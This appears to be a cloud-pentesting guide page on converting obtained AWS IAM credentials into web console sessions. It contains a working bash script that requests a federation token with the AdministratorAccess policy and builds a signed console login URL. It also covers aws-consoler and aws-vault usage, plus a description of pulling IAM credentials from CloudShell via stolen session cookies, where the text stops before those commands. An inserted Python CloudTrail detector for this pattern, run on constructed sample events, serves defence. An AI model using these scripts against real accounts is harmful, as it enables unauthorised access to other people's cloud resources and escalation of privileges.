If you have managed to obtain some IAM credentials, you may want to access the web console using the following tools.
Note that the user/role must have the sts:GetFederationToken permission.
Custom script
The following script uses the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to log in to the web console:
```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
status=$?  # Capture the exit status before another command overwrites $?

if [ "$status" -ne 0 ]; then
    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
    exit "$status"
fi

# Parse the output
session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
    --get \
    --data-urlencode "Action=getSigninToken" \
    --data-urlencode "SessionDuration=43200" \
    --data-urlencode "Session=$json_creds")
signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)

# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```
```bash
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] # This will generate a link to login into the console
```
Make sure the IAM user has the sts:GetFederationToken permission, or provide a role to assume.
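To spot this technique in CloudTrail, the added example below (not part of the original page) pairs each sts:GetFederationToken call with any later ConsoleLogin by the federated user it created. The events are constructed samples, the function name is hypothetical, and the field names are assumed to follow the CloudTrail record layout.

```python
import json

# Constructed CloudTrail-style records (placeholder account, users and IPs).
SAMPLE_EVENTS = json.loads("""[
 {"eventTime":"2024-01-01T10:00:00Z","eventSource":"sts.amazonaws.com",
  "eventName":"GetFederationToken","sourceIPAddress":"203.0.113.10",
  "userIdentity":{"type":"IAMUser","accountId":"111122223333","userName":"alice"},
  "requestParameters":{"name":"consoler","policyArns":
    [{"arn":"arn:aws:iam::aws:policy/AdministratorAccess"}]}},
 {"eventTime":"2024-01-01T10:00:42Z","eventSource":"signin.amazonaws.com",
  "eventName":"ConsoleLogin","sourceIPAddress":"203.0.113.10",
  "userIdentity":{"type":"FederatedUser","accountId":"111122223333",
    "arn":"arn:aws:sts::111122223333:federated-user/consoler"}},
 {"eventTime":"2024-01-01T11:00:00Z","eventSource":"signin.amazonaws.com",
  "eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.7",
  "userIdentity":{"type":"IAMUser","accountId":"111122223333","userName":"bob"}},
 {"eventTime":"2024-01-01T12:00:00Z","eventSource":"sts.amazonaws.com",
  "eventName":"GetFederationToken","sourceIPAddress":"198.51.100.9",
  "userIdentity":{"type":"IAMUser","accountId":"111122223333","userName":"ci-bot"},
  "requestParameters":{"name":"report"}}
]""")

ADMIN_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

def find_federation_console_pivots(events):
    """One finding per GetFederationToken call, with any later ConsoleLogin
    made by the federated user that call created."""
    findings = []
    for ev in events:
        if (ev.get("eventSource"), ev.get("eventName")) != ("sts.amazonaws.com", "GetFederationToken"):
            continue
        params = ev.get("requestParameters") or {}
        ident = ev.get("userIdentity") or {}
        # Federated principals appear as arn:aws:sts::<account>:federated-user/<name>
        fed_arn = f"arn:aws:sts::{ident.get('accountId')}:federated-user/{params.get('name')}"
        logins = [e for e in events
                  if e.get("eventName") == "ConsoleLogin"
                  and (e.get("userIdentity") or {}).get("arn") == fed_arn
                  and e["eventTime"] >= ev["eventTime"]]  # ISO-8601 UTC sorts as text
        findings.append({
            "caller": ident.get("userName"),
            "federated_arn": fed_arn,
            "admin_policy": ADMIN_ARN in [p.get("arn") for p in params.get("policyArns") or []],
            "console_logins": [(e["eventTime"], e["sourceIPAddress"]) for e in logins],
        })
    return findings

if __name__ == "__main__":
    for f in find_federation_console_pivots(SAMPLE_EVENTS):
        print(json.dumps(f))
```

A finding with both `admin_policy` set and a non-empty `console_logins` list is the pattern the script above produces; the `ci-bot` call shows a token request that never reached the console.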
aws-vault
aws-vault is a tool to securely store and access AWS credentials in a development environment.
```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```
You can also use aws-vault to obtain a browser session.
From Console to IAM Creds
Originally discovered in this post: if you manage to compromise some access to a web console (maybe you stole cookies and could not reach the .aws folder), you can obtain some IAM credentials for that user through CloudShell.
CloudShell exposes IAM credentials via an undocumented endpoint on port 1338. After loading the victim's session cookies into your browser, you can navigate to CloudShell and use the following commands to get the IAM credentials.